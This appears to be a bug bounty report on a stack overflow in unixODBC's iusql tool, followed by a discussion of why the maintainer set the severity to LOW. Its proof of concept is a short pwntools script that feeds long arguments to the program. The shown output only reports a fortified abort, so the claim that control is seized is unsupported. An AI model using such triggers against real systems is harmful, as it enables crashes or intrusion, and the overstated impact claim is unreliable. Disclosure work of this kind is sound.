classic overflow on the stack, with the ability to intercept control. in lurcher/unixodbc
May 31st 2022
if arguments longer than 1024 were passed to program
iusql, we get a classic stack overflow.
Proof of Concept
I removed the docking check to reduce POC, this check did not show overflow protection
git clone https://github.com/lurcher/unixODBC.git 123 sed -i 's/^.*if ( .*phEnv, phDbc ) != SQL_SUCCESS/if(0/g' 123/exe/iusql.c
import os os.environ['PWNLIB_NOTERM'] = '1' os.environ['JUPYTER_DETECTED'] ='yes' from pwn import * a = ['A']*4 a = '123/exe/iusql' a = cyclic(1024) a = cyclic(1024) a = cyclic(1024) ex = process(argv=a) ex.interactive()
[x] Starting local process '123/exe/iusql' [+] Starting local process '123/exe/iusql': pid 25548 [*] Switching to interactive mode *** buffer overflow detected ***: /content/123/exe/.libs/iusql terminated
when overflowing, control is seized, and the establishment of full control over the process
how can i see why the severity is lowered. in what criteria did I make a mistake. Thanks
good afternoon. in this report the developer fixed the level to LOW. but I can't figure out what stats it lowered. in the original rating was AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H how to see the current rating vector?
Hello 👋 The maintainer has hard set the severity level to LOW irrespective of the vectors - i.e. they generally think that this has a low impact.